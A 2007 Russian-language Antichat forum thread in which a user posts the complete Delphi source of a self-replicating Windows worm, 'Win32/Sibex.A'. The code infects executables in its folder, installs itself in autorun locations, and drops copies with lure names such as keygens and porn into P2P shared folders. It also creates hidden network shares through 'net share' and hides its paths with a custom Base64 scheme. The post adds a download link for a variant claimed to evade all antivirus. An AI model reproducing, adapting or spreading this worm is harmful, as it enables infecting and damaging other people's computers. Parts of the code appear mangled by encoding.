Форум АНТИЧАТ - Win32/Sibex.A мой червяк =)

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Защита ОС: вирусы, антивирусы, файрволы.
Win32/Sibex.A мой червяк =)

Опции темы

Поиск в этой теме

Опции просмотра

Win32/Sibex.A мой червяк =)

14.04.2007, 21:17

~~zl0y~~

Banned

Регистрация: 13.09.2006

Сообщений: 523

Провел на форуме:
2869410

Репутация: 925

Отправить сообщение для zl0y с помощью ICQ

Win32/Sibex.A мой червяк =)

Просматривая данную страницу вы подрузамеваете,что ответсвенность за все действия причиненные данный программой или кусками программного кода вы берете на себя !

Вот выложил думаю будет позновательно новичкам

Возможности вируса:
1)Заражение всех .exe файлов в папке в которой был запущен вирус
2)Распостранение в P2P файлообменных сетях таких как KazAaa,Emule и других.
3)Распостронение в локальных сетях посредством NETBIOS(разшаривает папку с вирусом.
4)Малый размер(у меня упакованный весил 29469 байт.

Сам вирус написан на Delphi7 чистый WinApi

Код вируса.

Цитата:

///////////////////////////////////////////
//By ZloY (c) 2007 ///////////////
//Please Not Delete Copyright Leacher!////
/////////////////////////////////////////////////////
Program Sibex;
uses windows,sysutils;

//Virus Size
const virsize=30469;

var
victims:tsearchrec;
f1,f2:file;
MyString : PChar;
a : string;
Vir : array[0..260] of Char;
greets : string;
randdir,randdir2 : string;
ST:systemtime;
randfilename: array[0..21] of string = ('porn_sites_key.exe','Porn_Sites_Keygen.exe','CDH ack 4.33.5.exe','Windows Vista Nuke.exe','Free Porn.exe','Counter Strike Cheats.exe','Gay movie.exe','Win Rar_Crack.exe','Windows Nuke.exe','Sex Tetris.exe','steam cracked.exe','Win Rar.exe','ICQ5_Hack.exe','Myfoto.exe','Ass_Anal_fr ee_sex.exe','Keygen.exe','Patch.exe','Keygenerator .exe','Delphi 2006 Keygen.exe','Delphi 7 Crack.exe','Delphi 2007 Crack.exe','3D Sex Girl INstaller.exe');
//DecodeBase64
function DB64(Value: String): String;
const b64alphabet: PChar = 'ЙЦУКЕНГШЩЗХЪФЫВАПРОЛДЖЭЯ� �СМИТЬБЮйцукенгшщзхъфывап� �олджэячсмитьбю';
function DecodeChunk(const Chunk: String): String;
var
W: LongWord;
i: Byte;
begin
W := 0; Result := '';
for i := 1 to 4 do
if Pos(Chunk[i], b64alphabet) <> 0 then
W := W + Word((Pos(Chunk[i], b64alphabet) - 1)) shl ((4 - i) * 6);
for i := 1 to 3 do
Result := Result + Chr(W shr ((3 - i) * 8) and $ff);
end;
begin
Result := '';
if Length(Value) mod 4 <> 0 then Exit;
while Length(Value) > 0 do
begin
Result := Result + DecodeChunk(Copy(Value, 0, 4));
Delete(Value, 1, 4);
end;
end;
//Integer To String
function IntToStr(Num: Integer): string;
begin
Str(Num, result);
end;
//Get Windows Dir
function WinDir: string;
begin
SetLength(Result, MAX_PATH);
Windows.GetWindowsDirectory(PChar(Result), MAX_PATH);
Result := string(PChar(Result)) + '\';
end;
//Get System Dir
function SysDir: string;
begin
SetLength(Result, MAX_PATH);
Windows.GetSystemDirectory(PChar(Result), MAX_PATH);
Result := string(PChar(Result)) + '\';
end;

procedure go;
label 10;
var
Buf: array[1..virsize] of byte;
rect:trect;
nr,nw:longint;
begin
////
try
filemode :=0;
assignfile(f1,paramstr(0));
reset(f1,1);
filemode :=2;
assignfile(f2,paramstr(0)+PChar(DB64('ЪгЖчСП ..')));

rewrite(f2,1);
seek(f1,virsize);
seek(f2,0) ;
repeat
filemode :=0;
BlockRead(f1, Buf,virsize, NR);
filemode :=2;
BlockWrite(f2, Buf, NR, NW);
until (NR = 0) or (NW <> NR) ;
closefile(f1);
closefile(f2);

winexec(pchar(paramstr(0)+PChar(DB64('ЪгЖчСП ..'))),SW_show);
10:
if not deletefile(pchar(paramstr(0)+PChar(DB64('ЪгЖч� �П..')))) then begin ;

sleep(400);
goto 10;
end;
except
end;
////
end;
//Infect Files On Disc!
procedure infect(victim:string);
var
a:integer;

Buf: array[1..virsize] of byte;
nr,nw:longint;
begin
try
randomize;
assignfile(f1,victim);
a:=random(200);
rename(f1,'123'+inttostr(a)) ;
filemode :=0;
assignfile(f2,paramstr(0));
reset(f2,1) ;
seek(f2,0);
blockread(f2,buf,virsize);
filemode:=2 ;
closefile(f2);
assignfile(f1,victim);
rewrite(f1,1);
blockwrite(f1,buf,virsize);
assignfile(f2,'123'+inttostr(a));
reset(f2,1);
seek(f2,0);
repeat
BlockRead(f2, Buf,virsize, NR);
BlockWrite(f1, Buf, NR, NW);
until (NR = 0) or (NW <> NR);
closefile(f1);
closefile(f2);
deletefile((pchar('123')+inttostr(a)));
except
end;
end;

begin
randomize;
//Get Local Time
getlocaltime(ST);
//Allocate Memory
GetMem(MyString, 255);
//Get HomePath
GetEnvironmentVariable(PChar(DB64('ОЕьЫРЖЦ� �ЖЕй.')), MyString, 255);
//Get Size of virus body
GetModuleFileNameA(0, Vir, SizeOf(Vir));
//Copy To Autorun!
CopyFile(Vir, Pchar(DB64('ПлзТ')+MyString+PChar(DB64('ЯФА ъчВЪыивДйиВЯыюнлАтВиктВКф иАыТпВЪоивЮйчюКлсбъйЯГНэТ ГжаИгндИяЩвСЯцн'))), True);
CopyFile(Vir, Pchar(DB64('ПлзТ')+MyString+PChar(DB64('ЯНЫ дЧЯЗдЩГжнИшЖТДШЗаСяЗцИЯЫТ ДяРцТшРжТНрцЬшЦыИэсзЬГьоЪ гЖчСП..'))), True);
CopyFile(Vir, Pchar(DB64('ПлзТ')+MyString+PChar(DB64('ЯЕж нИшДйПЯСэМЭьТДШЗаСяЗцИЭжз ЯЕЖлСЭЫжБгнаИгДйЧЯЖдИэжцЬ ГнкЧЖрцЬшЦыИэсзЬГьоЪгЖчСП ..'))), True);
CopyFile(Vir, Pchar(DB64('ПлзТ')+MyString+PChar(DB64('ЯНЫ дЧЯЗдИЭЖвЬЖрПТгьшТгНыИЭЖТ ПЯЖдИяЫдЧЯЗдЯГНэТГжаИгндИ яЩвСЯцн'))), True);
CopyFile(Vir, Pchar(DB64('ПлзТ')+MyString+PChar(DB64('ЯЕН фИУЦЖТэЖоТжрЫСЭсжЩЕнвМЭЫз ИжрПТгьшТгНыЧЯЫТОЭсзЧэнаЯ ГНэТГжаИгндИяЩвСЯцн'))), True);
//Greets For NoobZ.
greets:=('SibeX The Win32.Virus Written On The Delphi. Kaspersky hi

Greets All World and Vx Heavens... Now Satan Day.

');
//My Rand Function
randdir:=IntToStr(ST.wMinute)+IntToStr(ST.wYear)+I ntToStr(ST.wSecond)+IntToStr(ST.wHour);
randdir2:=IntToStr(ST.wMinute)+IntToStr(ST.wSecond )+IntToStr(ST.wHour)+IntToStr(ST.wDay);
//Copy File Into Folder(Small Worm Function).
CreateDirectory(Pchar(WinDir+PChar(randdir)), nil);
CreateDirectory(Pchar(WinDir+PChar(randdir2)), nil);
CopyFile(Vir,PChar(WinDir+PChar(randdir)+'\'+Pchar (randfilename[random(21)])), True);
CopyFile(Vir,PChar(WinDir+PChar(randdir2)+'\'+Pcha r(randfilename[random(21)])), True);
CopyFile(Vir,PChar(WinDir+PChar(randdir2)+'\'+Pcha r(randfilename[random(21)])), True);
winexec(PChar('cmd.exe /c net share Files=C:\Windows\'+PChar(randdir)),sw_hide);
winexec(PChar('cmd.exe /c net share My Documents=C:\Windows\'+PChar(randdir2)),sw_hide);

//Copy Worm Into Shared Folders (KazAaa,Emule(elame)

or ect...
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжрЪЧЯзцЧО ЦФМЯРнЩЕфъХжрыБОЦлМГНоСЭП йСгьфСГЖоЯЙ..'))+Pchar(randfilename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжръЧЯзцЧО ЦфМЯРнЯГжсЩШЫщЧЯЗнСУЦгИэр еСЯЗТ'))+Pchar(randfilename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжръЧЯзцЧЖ рыБОЦлМГНоСЭПйСгьфСГЖоЯЙ.. '))+Pchar(randfilename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжрыИяЗпМГ ЖжТжрыБОЦлМГНоСЭПйСгьфСГЖ оЯЙ..'))+Pchar(randfilename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжршТгьъТя РнТнрыБОЦшТгьъТяРнТнп.'))+Pch ar(randfilename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжруСЭНоТэ ццТгЖТТэццТгЖеЯЙ..'))+Pchar(randfi lename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжрнСГьвМэ ЖсФкЙпФНрзИгЫаИЭнвСжп.'))+Pch ar(randfilename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжрфМЭжнЬэ ноСЖрлМГНоСЭРТ'))+Pchar(randfilename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжряМЭсыБН рлМГНоСЭРТ'))+Pchar(randfilename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('И ЯейТэццТгЖеЩГСаИГРнТнп.'))+P char(randfilename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжрЗПжНТДэ ццТгЖеЩЕСаИГРнТй..'))+Pchar(randfi lename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжраЬгЖоИг ЖдЯГнвЧэьыМЭсшЯЙ..'))+Pchar(randfi lename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Л ЯейРГьяИграЧЭРлЯЙ..'))+Pchar(rand filename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжрОЧЯЦзСэ НдИяЗТДэццТгЖТ'))+Pchar(randfilename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжрЧИэраЭН рЕИяЬвИГьцСШЫТ'))+Pchar(randfilename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Ч лзТТШЗаСяЗцИОЦгМЭрнТжрДСЯ ЫфЧЖрГМЭрнТжп.'))+Pchar(randfilename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжрЯМЭсЫЭН рЫБОЦЛМГНоСЭПйРгьфСГЖоЯЙ.. '))+Pchar(randfilename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжрЛМГНоСЭ НмЧЖрЕИяЬвИГьцСШЫТ'))+Pchar(rand filename[random(3)])), True);
CopyFile(Vir,PChar(DB64('ПлзТ')+PChar(DB64('Т ШЗаСяЗцИОЦгМЭрнТжрШИшЖкИГ ЖжТжрЕИяЬвИГьцСШЫТ'))+Pchar(rand filename[random(3)])), True);

//Infect Files On Body Worm
//CopyFile(Vir,PChar(SysDir+'\'+PChar(randdir)+PChar (DB64('ЪгЖчСП..'))), True);
//winexec((PChar(SysDir+'\'+PChar(randdir)+PChar(DB6 4('ЪгЖчСП..')))),sw_hide);

//CopyFile(Vir,PChar(WinDir+'\'+PChar(randdir)+PChar (DB64('ЪгЖчСП..'))), True);
//winexec((PChar(WinDir+'\'+PChar(randdir)+PChar(DB6 4('ЪгЖчСП..')))),sw_hide);

//Virus Function!!!
try
filemode :=0;
assignfile(f1,paramstr(0));
reset(f1,1);
if filesize(f1)>virsize then go;
closefile(f1);

filemode :=2;
except
end;
if FindFirst(PChar(DB64('ХуснБГД.')), Faanyfile, victims) = 0 then
repeat
if not ((victims.Name)=extractfilename(paramstr(0))) then begin
if not ((victims.Name)=extractfilename(extractfilename(pa ramstr(0)))) then infect(victims.Name);
end;
until FindNext(victims)<>0 ;
end.

Также немного модифицированный код вируса !
На данный момент не дектируецца на 1 антивирусом

http://slil.ru/24235569

14.04.2007, 21:27

v1ru$

Постоянный

Регистрация: 17.03.2007

Сообщений: 336

Провел на форуме:
3766085

Репутация: 576

Отправить сообщение для v1ru$ с помощью ICQ

смайлики в коде жгут!
По теме,что это за червяк?что он делает,кроме размножения

14.04.2007, 21:27

~~a1ex~~

Banned

Регистрация: 11.10.2006

Сообщений: 682

Провел на форуме:
3750406

Репутация: 271

Отправить сообщение для a1ex с помощью ICQ

Отправить сообщение для a1ex с помощью AIM

Отправить сообщение для a1ex с помощью MSN

Отправить сообщение для a1ex с помощью Yahoo

Хмм...интересно...

14.04.2007, 21:30

~~zl0y~~

Banned

Регистрация: 13.09.2006

Сообщений: 523

Провел на форуме:
2869410

Репутация: 925

Цитата:

Сообщение от v1ru$

смайлики в коде жгут!
По теме,что это за червяк?что он делает,кроме размножения

Скомпиль да запусти

у меня пример каждый 7-6 файл в локалке им заражен

14.04.2007, 22:35

~~SpewFire~~

Banned

Регистрация: 14.03.2007

Сообщений: 82

Провел на форуме:
996198

Репутация: 85

Отправить сообщение для SpewFire с помощью ICQ

Сорец - норм!!! афтару +

15.04.2007, 00:04

~~KEZ~~

Banned

Регистрация: 18.05.2005

Сообщений: 1,981

Провел на форуме:
1941233

Репутация: 2726

Цитата:

4)Малый размер(у меня упакованный весил 29469 байт.

Сам вирус написан на Delphi7 чистый WinApi

Сегодня был на конференции про И.Т. среди поступающих в какой-то институт, но даже там ничего тупее не заметил

15.04.2007, 00:07

~~KEZ~~

Banned

Регистрация: 18.05.2005

Сообщений: 1,981

Провел на форуме:
1941233

Репутация: 2726

Цитата:

Просматривая данную страницу вы подрузамеваете,что ответсвенность за все действия причиненные данный программой или кусками программного кода вы берете на себя !

а что если я ее уже открыл но не соглашался с этим? давай тогда если ты это читаешь ты подразумеваешь что должен мне милион баксов?

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Мой вирус Арабеска 1.0	gold-goblin	Защита ОС: вирусы, антивирусы, файрволы.	21	01.05.2007 22:37
Про нас, про мужчин!	SladerNon	Болталка	27	21.02.2007 16:44
Мой первый сайт	7ion	Обсуждение Ваших сайтов	37	01.01.2007 19:16
Зацените мой сайт!	Utochka	Болталка	3	25.02.2006 20:47

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход